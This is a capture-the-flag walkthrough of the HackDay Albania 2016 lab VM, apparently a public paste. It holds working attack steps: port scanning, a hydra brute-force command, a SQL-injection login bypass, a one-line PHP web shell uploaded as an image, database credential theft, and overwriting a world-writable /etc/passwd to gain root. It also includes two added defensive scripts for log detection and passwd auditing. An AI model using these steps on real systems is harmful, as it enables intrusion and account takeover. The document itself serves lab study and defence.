Untitled

a guest
Nov 29th, 2016
# Let's check our virtual machine IP:

Currently scanning: 192.168.6.0/16 | Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 84
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.84 08:00:27:98:0d:5f 1 42 CADMUS COMPUTER SYSTEMS
(...)


# With that IP, let's scan it to check what's going on:

tlopes@blackbox:~$ nmap -p 1-65535 -v -A -T5 192.168.1.84

Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-28 00:02 WET
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating Ping Scan at 00:02
Scanning 192.168.1.84 [2 ports]
Completed Ping Scan at 00:02, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:02
Completed Parallel DNS resolution of 1 host. at 00:02, 0.03s elapsed
Initiating Connect Scan at 00:02
Scanning hackday.lan (192.168.1.84) [65535 ports]
Discovered open port 22/tcp on 192.168.1.84
Discovered open port 8008/tcp on 192.168.1.84
Completed Connect Scan at 00:02, 1.44s elapsed (65535 total ports)
Initiating Service scan at 00:02
Scanning 2 services on hackday.lan (192.168.1.84)
Completed Service scan at 00:02, 6.02s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.84.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.51s elapsed
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Nmap scan report for hackday.lan (192.168.1.84)
Host is up (0.0060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
|_ 256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HackDay Albania 2016
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds
tlopes@blackbox:~$


-- we can see 2 different services running at ports 8008 (http) and 22 (ssh)

# Robots.txt shows a lot of disallowed entries, let's check what's there:

tlopes@blackbox:~$ for i in `curl 192.168.1.84:8008/robots.txt | cut -d: -f2`; do echo "======"; echo "Folder: $i"; curl "192.168.1.84:8008$i"; echo ""; done;
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 702 100 702 0 0 307k 0 --:--:-- --:--:-- --:--:-- 685k
======
Folder: /rkfpuzrahngvat/
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hmmmm????</title>
</head>
<body>
<center><img src="background.jpg"></center>
</body>
</html>
======
Folder: /slgqvasbiohwbu/
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hmmmm????</title>
</head>
<body>
<center><img src="background.jpg"></center>
</body>
</html>
======
Folder: /tmhrwbtcjpixcv/

(...)

======
Folder: /unisxcudkqjydw/
IS there any /vulnbank/ in there ???

======

# Opening "http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/" and then going to "client/login.php"
-- it was possible to see a login form

# Submitting the form with the variable names changed to arrays, username[] and password[], gave the following error:

Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
Invalid Credentials . . .

-- I tried some variants but nothing special happened

# I executed hydra to try some user/pass combinations, but without luck
hydra 192.168.122.95 -s 8008 http-post-form "/unisxcudkqjydw/vulnbank/client/login.php:username=^USER^&password=^PASS^:Invalid"

# At the same time, I executed sqlmap, which found one blind injection ..
-- I had no luck getting sqlmap to own the database for me, so I did it myself:
.. after some tries.. I was able to bypass the form using the following combination:

username: ' or 'a' = 'a' --
password: #

# On the new page there's a "Contact Support" form
-- I tried to upload a .php file but it failed (only images allowed)
-- so I renamed the file to .jpg and it worked!

tlopes@blackbox:~$ cat shell.jpg
<?php
system($_GET['cmd']);

# Testing the PHP:

-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

# It worked! Local access to the shell
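From the defender's side, every one of the requests above lands in the web server's access log with the command in the query string. The script below is an added example, not part of the original write-up or of the VM: detect_webshell_hits reads Apache combined-format log lines and prints one alert per GET to view_file.php that carries a cmd= parameter, with the percent-encoded command decoded for readability. The script name, parameter names and path (view_file.php, filename, cmd, /unisxcudkqjydw/vulnbank/client/) come from the write-up; the log format and the sample log lines are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag requests that use an
# uploaded file as a command channel through view_file.php.
# detect_webshell_hits LOGFILE  -> one "ALERT ..." line per hit, then a summary.

detect_webshell_hits() {
    awk '
        # value of a two-digit lowercase hex string, without gawk-only strtonum()
        function hexval(h,   hd) {
            hd = "0123456789abcdef"
            return (index(hd, substr(h, 1, 1)) - 1) * 16 + index(hd, substr(h, 2, 1)) - 1
        }
        # decode %XX and + so the command reads as the attacker typed it
        function urldecode(s,   out, c, hex) {
            out = ""
            while (length(s) > 0) {
                c = substr(s, 1, 1)
                hex = tolower(substr(s, 2, 2))
                if (c == "%" && hex ~ /^[0-9a-f][0-9a-f]$/) {
                    out = out sprintf("%c", hexval(hex))
                    s = substr(s, 4)
                } else {
                    out = out (c == "+" ? " " : c)
                    s = substr(s, 2)
                }
            }
            return out
        }
        # combined log format, whitespace-split: $1 client IP, $7 request path, $9 status
        index($7, "view_file.php?") > 0 {
            q = $7
            sub(/^[^?]*\?/, "", q)          # keep only the query string
            n = split(q, kv, "&")
            cmd = ""; fname = ""
            for (i = 1; i <= n; i++) {
                if (kv[i] ~ /^cmd=/) cmd = substr(kv[i], 5)
                else if (kv[i] ~ /^filename=/) fname = substr(kv[i], 10)
            }
            if (cmd == "") next             # a plain file view is normal use
            hits++
            printf "ALERT ip=%s status=%s file=%s cmd=\"%s\"\n", $1, $9, fname, urldecode(cmd)
        }
        END { printf "%d suspicious request(s)\n", hits }
    ' "$1"
}

# Constructed sample log: two benign requests, one legitimate image view and two
# hits of the kind the write-up generated (these lines are made up for the example).
LOG=$(mktemp)
trap 'rm -f "$LOG"' EXIT
cat >"$LOG" <<'EOF'
192.168.1.10 - - [28/Nov/2016:01:15:41 +0000] "GET /unisxcudkqjydw/vulnbank/client/login.php HTTP/1.1" 200 348 "-" "Mozilla/5.0"
192.168.1.10 - - [28/Nov/2016:01:17:03 +0000] "POST /unisxcudkqjydw/vulnbank/client/ticket.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.10 - - [28/Nov/2016:01:17:20 +0000] "GET /unisxcudkqjydw/vulnbank/client/view_file.php?filename=logo.jpg HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.168.1.10 - - [28/Nov/2016:01:18:02 +0000] "GET /unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
192.168.1.10 - - [28/Nov/2016:01:18:30 +0000] "GET /unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-al HTTP/1.1" 200 812 "-" "Mozilla/5.0"
EOF

detect_webshell_hits "$LOG"
```

On a real host the call is detect_webshell_hits /var/log/apache2/access.log (or the site's own CustomLog path). The match is deliberately narrow, a cmd= parameter on this one script, so it produces no noise from ordinary image views; the same structure extends to any parameter name an application should never see.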

# Checking what's going on in the current dir

-- http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-al
total 52
drwxrwxr-x 4 taviso taviso 4096 Oct 20 12:28 .
drwxrwxr-x 3 taviso taviso 4096 Oct 20 12:31 ..
-rwxr-xr-x 1 taviso taviso 87 Oct 19 08:31 client.php
-rwxr-xr-x 1 taviso taviso 4137 Oct 20 12:27 config.php
drwxr-xr-x 2 taviso taviso 4096 Oct 19 08:15 images
-rwxr-xr-x 1 taviso taviso 403 May 23 2016 index.php
-rwxr-xr-x 1 taviso taviso 348 Oct 20 11:58 login.php
-rwxr-xr-x 1 taviso taviso 81 May 22 2016 logout.php
-rwxr-xr-x 1 taviso taviso 1198 Oct 20 12:28 ticket.php
drwxrwxrwx 2 taviso taviso 4096 Nov 28 01:17 upload
-rwxr-xr-x 1 taviso taviso 532 Oct 19 08:29 view_file.php
-rwxr-xr-x 1 taviso taviso 1029 Oct 19 08:29 view_ticket.php

# Checking the config.php

-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20config.php
(...)
$db_host = "127.0.0.1";
$db_name = "bank_database";
$db_user = "root";
$db_password = "NuCiGoGo321";
(...)

# Dumping all databases:

-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=mysqldump%20-uroot%20-pNuCiGoGo321%20--all-databases
Nothing relevant in the dump

# ps axu, init.d, cron.d and other relevant folders didn't return anything valuable to attack

# Tried to exploit mysqld with race conditions to escalate privileges, but it failed due to permissions

# After some time searching configurations I found out that passwd had write permissions:
-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-alhtr%20/etc%20|%20grep%20passwd
-rw------- 1 root root 1.6K Oct 9 13:13 passwd-
-rw-r--rw- 1 root root 1.6K Oct 22 17:21 passwd


# Listing all users available:
-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash


# Let's try to change the "taviso" account to a known password
-- first simulating it on my own computer:

tlopes@blackbox:~$ sudo adduser deleteme
[sudo] password for tlopes:
Adding user `deleteme' ...
Adding new group `deleteme' (1001) ...
Adding new user `deleteme' (1001) with group `deleteme' ...
Creating home directory `/home/deleteme' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for deleteme
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]

tlopes@blackbox:~$ sudo cat /etc/shadow | grep deleteme
deleteme:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:17133:0:99999:7::

# Let's use the previous hash as a template to create the new "taviso" entry:

taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash


# Now, let's remove taviso from /etc/passwd
192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=sed%20%27/taviso/d%27%20/etc/passwd%20>%20/tmp/passwd.bk
192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cp%20/tmp/passwd.bk%20/etc/passwd

# And add our new "taviso" created in the previous step:

-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=echo%20%27taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash%27%20%3E%3E%20/etc/passwd

# Confirming everything went ok:
-- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd%20|%20grep%20taviso

Yup, the account is there with our password "password"

taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash
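The escalation above depends on two conditions that a routine host check would catch before an attacker does: /etc/passwd writable by "other" (the -rw-r--rw- mode shown earlier; the expected mode is 0644, owned by root), and an entry whose second field carries a password hash instead of the "x" marker that defers to /etc/shadow. The script below is an added example, not part of the original write-up: audit_passwd checks a passwd-format file for both conditions and also for extra UID-0 accounts, duplicate user names and empty password fields. The sample file it runs on is constructed for the example, and the hash in it is a placeholder string, not a real hash. It relies on POSIX sh, find and awk only.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a passwd-format file.
# Findings, one per line:
#   WORLD_WRITABLE  the other-write bit is set (the -rw-r--rw- seen on the VM)
#   HASH_IN_PASSWD  the password field holds a hash instead of the "x" shadow marker
#   EMPTY_PASSWORD  the password field is empty
#   EXTRA_UID0      a UID-0 account other than root
#   DUPLICATE_USER  the same user name appears twice
#   MALFORMED       a line without seven colon-separated fields
# audit_passwd FILE  -> prints the findings and returns their count (0 = clean)

audit_passwd() {
    f="$1"
    n=0
    # (1) mode check: with the other-write bit set, any local user, including a
    # compromised web server process, can rewrite the file
    if [ -n "$(find "$f" -perm -002 -print)" ]; then
        echo "WORLD_WRITABLE $f"
        n=$((n + 1))
    fi
    # (2) one awk pass over the seven colon-separated fields
    report=$(awk -F: '
        NF != 7 { print "MALFORMED line " NR; next }
        $2 == "" { print "EMPTY_PASSWORD " $1 }
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print "HASH_IN_PASSWD " $1 }
        $3 == 0 && $1 != "root" { print "EXTRA_UID0 " $1 }
        seen[$1]++ { print "DUPLICATE_USER " $1 }
    ' "$f")
    if [ -n "$report" ]; then
        printf '%s\n' "$report"
        n=$((n + $(printf '%s\n' "$report" | awk 'END { print NR }')))
    fi
    return "$n"
}

# Constructed sample input, not copied from any real host. The hash is a
# placeholder in crypt(3) layout, not a real hash.
SAMPLE=$(mktemp)
CLEAN=$(mktemp)     # mktemp creates files with mode 0600
trap 'rm -f "$SAMPLE" "$CLEAN"' EXIT
cat >"$SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
taviso:$6$placeholdersalt$PLACEHOLDERhashNOTreal:1000:1000:Taviso,,,:/home/taviso:/bin/bash
backdoor:x:0:0::/root:/bin/bash
www-data:x:1001:1001::/tmp:/bin/sh
EOF
chmod 646 "$SAMPLE"  # the same -rw-r--rw- mode the write-up found on /etc/passwd

cat >"$CLEAN" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
EOF

audit_passwd "$SAMPLE" || echo "sample: $? finding(s)"
audit_passwd "$CLEAN" && echo "clean: no findings"
```

On a live system the call is audit_passwd /etc/passwd; a non-zero return from cron is enough to raise an alert. The mode finding is the one to fix first (chmod 0644 and root ownership), because with it in place every other entry in the file is attacker-controlled.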

# Now let's try to connect using SSH to this account:

tlopes@blackbox:~$ ssh taviso@192.168.1.84
The authenticity of host '192.168.1.84 (192.168.1.84)' can't be established.
ECDSA key fingerprint is SHA256:IWIi1cnAziEW50tRA6HT1S4Zp/bo+pjpAvJ3FddNSOE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.84' (ECDSA) to the list of known hosts.
taviso@192.168.1.84's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

36 packages can be updated.
2 updates are security updates.


*** System restart required ***
Last login: Sat Oct 29 23:07:00 2016
-bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
taviso@hackday:~$


-- BAM!

# Let's see if taviso is in the sudoers file:

taviso@hackday:~$ sudo -i
[sudo] password for taviso:
-bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
root@hackday:~#

-- BAM!

# Let's see what root has in his home dir

root@hackday:~#ls -al
total 28
drwx------ 3 root root 4096 Oct 22 17:21 .
drwxr-xr-x 23 root root 4096 Nov 28 01:02 ..
-rw------- 1 root root 58 Oct 22 17:21 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4096 Oct 9 13:18 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 61 Oct 9 13:36 flag.txt

-- BAM! a flag :)

root@hackday:~# cat flag.txt
Urime,
Tani nis raportin!

d5ed38fdbf28bc4e58be142cf5a17cf5